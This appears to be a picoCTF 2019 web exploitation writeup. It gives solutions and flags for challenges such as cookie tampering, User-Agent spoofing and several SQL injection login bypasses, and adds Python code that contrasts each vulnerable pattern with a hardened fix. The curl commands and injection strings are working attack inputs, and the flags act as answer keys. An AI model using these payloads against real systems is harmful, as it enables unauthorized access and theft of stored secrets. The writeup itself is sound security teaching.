Web Exploitation Writeup
Table of Contents
- Insp3ct0r - Points: 50
- dont-use-client-side - Points: 100
- logon - Points: 100
- where are the robots - Points: 100
- Client-side-again - Points: 200
- Open-to-admins - Points: 200
- picobrowser - Points: 200
- Irish-Name-Repo 1 - Points: 300
- Irish-Name-Repo 2 - Points: 350
- Irish-Name-Repo 3 - Points: 400
- Empire1 - Points: 400
- Empire2 - Points: 450
- Insp3ct0r - Points: 50
- Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/63975/ or http://2019shell1.picoctf.com:63975
Hint: How do you inspect web code on a browser? There's 3 parts
Analyze the HTML, CSS and JS; each part holds a piece of the flag.
picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?d3db9182}
- dont-use-client-side - Points: 100
- Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/45147/ or http://2019shell1.picoctf.com:45147
Hint: Never trust the client
Find the flag by viewing the page source: the check runs entirely in client-side JavaScript.
picoCTF{no_clients_plz_4a60f3}
- logon - Points: 100
- The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? https://2019shell1.picoctf.com/problem/32270/ or http://2019shell1.picoctf.com:32270
Hint: Hmm it doesn't seem to check anyone's password, except for {{name}}'s?
- Log in as admin
- Open the browser's developer tools and look under Storage (we are looking for the cookies)
- Change the value of the admin cookie from False to True
picoCTF{l3arn_th3_r0p35}
- where are the robots - Points: 100
- Can you find the robots? https://2019shell1.picoctf.com/problem/32229/ or http://2019shell1.picoctf.com:32229
Hint: What part of the website could tell you where the creator doesn't want you to look?
$ wget --spider -r --no-parent http://2019shell1.picoctf.com:32229
picoCTF{ca1cu1at1ng_Mach1n3s_0ecd0}
- Client-side-again - Points: 200
- Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/47277/ or http://2019shell1.picoctf.com:47277
Hint: What is obfuscation?
Analyze the obfuscated JavaScript and reorder the pieces of the flag it contains.
picoCTF{not_this_again_d29871}
- Open-to-admins - Points: 200
- This secure website allows users to access the flag only if they are admin and if the time is exactly 1400. https://2019shell1.picoctf.com/problem/12276/ or http://2019shell1.picoctf.com:12276
Hint: Can cookies help you to get the flag?
$ curl "https://2019shell1.picoctf.com/problem/12276/flag" -H "Cookie: time=1400; admin=True;" -s | grep -oE "picoCTF{.*}"
picoCTF{0p3n_t0_adm1n5_dcb566bb}
- picobrowser - Points: 200
- This website can be rendered only by picobrowser, go and catch the flag! https://2019shell1.picoctf.com/problem/12255/ or http://2019shell1.picoctf.com:12255
Hint: You don't need to download a new web browser
$ curl "https://2019shell1.picoctf.com/problem/12255/flag" -H "User-Agent:picobrowser" -s | grep -oE "picoCTF{.*}"
picoCTF{p1c0_s3cr3t_ag3nt_bbe8a517}
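The logon, Open-to-admins and picobrowser challenges share one root cause: the server derives an access decision from values the client sends (an admin cookie, a time cookie, the User-Agent). The Python below is an added example, not code from this writeup or from picoCTF. vulnerable_check reproduces that pattern; hardened_check beside it takes the role from an HMAC-signed session cookie minted by the server at login and the time from the server's own clock, and ignores the User-Agent entirely. SERVER_SECRET, the cookie name "session", the "username:role" payload format and the function names are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a server-side secret. A real server loads it from
# configuration; it never comes from the request.
SERVER_SECRET = secrets.token_bytes(32)


def parse_cookies(header: str) -> dict:
    """Split a raw Cookie header into a dict. Every value here is client-chosen."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def vulnerable_check(headers: dict) -> bool:
    """The pattern the three challenges exploit: the decision is computed from an
    `admin` cookie, a `time` cookie and the User-Agent, all set by the client."""
    cookies = parse_cookies(headers.get("Cookie", ""))
    return (
        cookies.get("admin") == "True"
        and cookies.get("time") == "1400"
        and headers.get("User-Agent") == "picobrowser"
    )


def _mac(payload: str) -> str:
    return hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(username: str, is_admin: bool) -> str:
    """Mint the session cookie value at login. The role is decided by the server
    and bound to the payload with an HMAC, so editing 'user' to 'admin' in the
    browser's storage tab invalidates the cookie instead of granting access."""
    payload = f"{username}:{'admin' if is_admin else 'user'}"  # assumed format
    return f"{payload}.{_mac(payload)}"


def hardened_check(headers: dict, server_hour: int) -> bool:
    """Same policy (admin, and the time is 1400), but both facts come from the
    server: the role from a verified session cookie, the time from its own clock.
    The User-Agent is not consulted at all, since any client can claim any value."""
    token = parse_cookies(headers.get("Cookie", "")).get("session", "")
    payload, sep, mac = token.rpartition(".")
    if not sep or not hmac.compare_digest(mac.encode(), _mac(payload).encode()):
        return False  # missing, edited or forged session cookie
    return payload.endswith(":admin") and server_hour == 1400


if __name__ == "__main__":
    forged = {"Cookie": "admin=True; time=1400", "User-Agent": "picobrowser"}
    print("vulnerable grants forged request:", vulnerable_check(forged))      # True
    print("hardened grants forged request:", hardened_check(forged, 1400))    # False
    signed = {"Cookie": "session=" + issue_session("alice", True)}
    print("hardened grants signed session:", hardened_check(signed, 1400))    # True
```

The detection angle is the same for all three challenges: a request that carries admin=True without a matching server-issued session, or a User-Agent string that only a checker would ever send, is worth logging. The fix is never a stricter cookie name; it is refusing to let the client assert its own role.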
- Irish-Name-Repo 1 - Points: 300
- There is a website running at https://2019shell1.picoctf.com/problem/32241/ or http://2019shell1.picoctf.com:32241. Do you think you can log us in? Try to see if you can login!
Hint: There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?
Hint: Try to think about how does the website verify your login?
- It's a SQL injection challenge. On the login page, view the source (Ctrl+U), find the hidden debug input field, change its value to 1 and submit an arbitrary login request:
<input type="hidden" name="debug" value="1">
- The output should look like the following:
username: admin
password: admin
SQL query: SELECT * FROM users WHERE name='admin' AND password='admin'
Login failed.
- To bypass the authentication, a SQL injection string is needed in the username field:
# 'or 1=1 --
curl "https://2019shell1.picoctf.com/problem/32241/login.php" --data "username='+or+1=1+--&password=1234" && echo
picoCTF{s0m3_SQL_0397f20c}
- Irish-Name-Repo 2 - Points: 350
- There is a website running at https://2019shell1.picoctf.com/problem/14912/ or http://2019shell1.picoctf.com:14912. Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login!
Hint: The password is being filtered.
- Like the previous one, it's a SQL injection challenge. The only difference is that this time our input is checked before the query is built. The following request solves the challenge:
curl "https://2019shell1.picoctf.com/problem/14912/login.php" --data "username='+--&password=admin" && echo
picoCTF{m0R3_SQL_plz_752d1173}
- Irish-Name-Repo 3 - Points: 400
- There is a secure website running at https://2019shell1.picoctf.com/problem/47247/ or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!
Hint: Seems like the password is encrypted.
- Like the previous ones, it's a SQL injection challenge, but this time the password seems to be encrypted in some way. After setting the value of debug to 1 as before and sending an authentication request, the output is:
password: 'or 1=1--
SQL query: SELECT * FROM admin where password = ''be 1=1--'
- To solve this challenge, the same transformation has to be applied to the injection string (the output above shows that "or" becomes "be"):
# 'be 1=1 --
curl "https://2019shell1.picoctf.com/problem/47247/login.php" --data "password='+be+1=1+--" && echo
picoCTF{3v3n_m0r3_SQL_c2c37f5e}
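All three Irish-Name-Repo challenges come down to a query built by string concatenation, which the debug output makes visible. The Python below is an added example, not the challenge's code or picoCTF's: vulnerable_login rebuilds the Repo 1 query shape, vulnerable_rot13_login rebuilds the Repo 3 shape (the debug output turns "or" into "be", which is what ROT13 does to those two letters, so ROT13 is assumed here), and hardened_login shows the parameterised query that makes the same inputs harmless. The in-memory SQLite database, the table contents, CONSTRUCTED_SECRET and the name make_db are constructed for the example.

```python
import codecs
import sqlite3

# Constructed in-memory stand-in for the challenge database. The two query shapes
# come from the writeup's debug output; table contents are made up for the example.
CONSTRUCTED_SECRET = "constructed-password-not-the-real-one"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("CREATE TABLE admin (password TEXT)")
    # Plaintext only to keep the example short; a real table stores a password hash.
    db.execute("INSERT INTO users VALUES ('admin', ?)", (CONSTRUCTED_SECRET,))
    db.execute("INSERT INTO admin VALUES (?)", (CONSTRUCTED_SECRET,))
    return db


def _row_exists(db: sqlite3.Connection, query: str) -> bool:
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL: treat as a failed login rather than crash


def vulnerable_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Repo 1 shape: SELECT * FROM users WHERE name='...' AND password='...'
    built by concatenation, exactly as the debug line prints it."""
    return _row_exists(
        db, f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"
    )


def vulnerable_rot13_login(db: sqlite3.Connection, password: str) -> bool:
    """Repo 3 shape: the input is transformed before concatenation. The debug
    output maps 'or' to 'be', which is what ROT13 does, so ROT13 is assumed here.
    Quotes, spaces and '--' pass through the transform unchanged, so the query
    is still injectable: a letter substitution is not an input validation."""
    transformed = codecs.encode(password, "rot13")
    return _row_exists(db, f"SELECT * FROM admin WHERE password = '{transformed}'")


def hardened_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input is compared as data and never parsed as syntax."""
    row = db.execute(
        "SELECT 1 FROM users WHERE name = ? AND password = ?", (username, password)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "admin", "' or 1=1 --"))      # True: bypassed
    print(vulnerable_rot13_login(db, "'be 1=1 --"))         # True: bypassed
    print(hardened_login(db, "admin", "' or 1=1 --"))       # False
    print(hardened_login(db, "admin", CONSTRUCTED_SECRET))  # True
```

Two defensive points follow from the three challenges together. First, the debug output that prints the assembled query is itself the finding: a production login must never echo SQL or driver errors. Second, the Repo 2 and Repo 3 "strengthening" (a filter on one field, a transform on another) leaves the concatenation in place, and the parameterised form above is the only change that removes the class of bug rather than one payload.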
- Empire1 - Points: 400
- Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/49726/ or http://2019shell1.picoctf.com:49726 Can you first find the secret code they assigned to you?
Hint: Pay attention to the feedback you get
Hint: There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
Hint: The database gets reverted every 2 hours if you do break it, just come back later
- SQL injection on the register and login pages was the first thing tried: those pages don't seem to be vulnerable. So a user was created. After logging in, the first thing noticed was the todo page, and a simple injection was tried there. It didn't work either, but an error was displayed afterwards, which shows it's the right way. After some more attempts and some research, the string that solved the challenge is:
'||( select group_concat(secret) from user) ||'
picoCTF{wh00t_it_a_sql_injectdf389592}
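The Empire1 todo page differs from the login challenges in two ways the writeup points at: the injection lands in an INSERT rather than a SELECT, so the result of a subquery is stored and then shown back to the user, and the database error the page displays is the "feedback" the hint mentions. The Python below is an added example, not the challenge's code or picoCTF's. The in-memory SQLite database, its contents, the todo table and the function names are constructed for the example; the writeup reveals only that a user table with a secret column exists.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database: the writeup reveals a
# `user` table with a `secret` column and a todo page; everything else is assumed.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, secret TEXT)")
    db.execute("CREATE TABLE todo (owner TEXT, item TEXT)")
    db.executemany(
        "INSERT INTO user VALUES (?, ?)",
        [("agent513", "CONSTRUCTED-SECRET-1"), ("boss", "CONSTRUCTED-SECRET-2")],
    )
    return db


def newest_item(db: sqlite3.Connection, owner: str) -> str:
    """What the todo page renders back to the user for their latest entry."""
    row = db.execute(
        "SELECT item FROM todo WHERE owner = ? ORDER BY rowid DESC LIMIT 1", (owner,)
    ).fetchone()
    return row[0]


def vulnerable_add_todo(db: sqlite3.Connection, owner: str, item: str) -> str:
    """Item concatenated into the INSERT. An item that closes the quote and uses
    SQL's || operator is evaluated as SQL, so the result of an embedded subquery
    is what gets stored and shown back. A malformed item raises sqlite3.Error."""
    db.execute(f"INSERT INTO todo (owner, item) VALUES ('{owner}', '{item}')")
    return newest_item(db, owner)


def vulnerable_page(db: sqlite3.Connection, owner: str, item: str) -> str:
    """Response of a page that prints database exceptions verbatim. This is the
    'feedback' the hint refers to: it confirms the input reached the SQL parser
    and often names the engine. A real page logs the exception and returns a
    generic message instead."""
    try:
        return vulnerable_add_todo(db, owner, item)
    except sqlite3.Error as exc:
        return f"error: {exc}"


def hardened_add_todo(db: sqlite3.Connection, owner: str, item: str) -> str:
    """Parameterised INSERT: the item is stored exactly as typed, quotes and
    subqueries included, and is never interpreted as SQL."""
    db.execute("INSERT INTO todo (owner, item) VALUES (?, ?)", (owner, item))
    return newest_item(db, owner)


if __name__ == "__main__":
    db = make_db()
    payload = "'||( select group_concat(secret) from user) ||'"
    print(vulnerable_add_todo(db, "agent513", payload))  # both constructed secrets
    print(hardened_add_todo(db, "agent513", payload))    # the literal payload string
    print(vulnerable_page(db, "agent513", "it's"))       # error: ... (leaked detail)
```

Because the stored item is rendered later on a different page, this is the stored (second-order) form of injection, and it is the reason a filter on the register and login forms alone did not protect the application: every statement that touches user-supplied text, including inserts, needs the parameterised form.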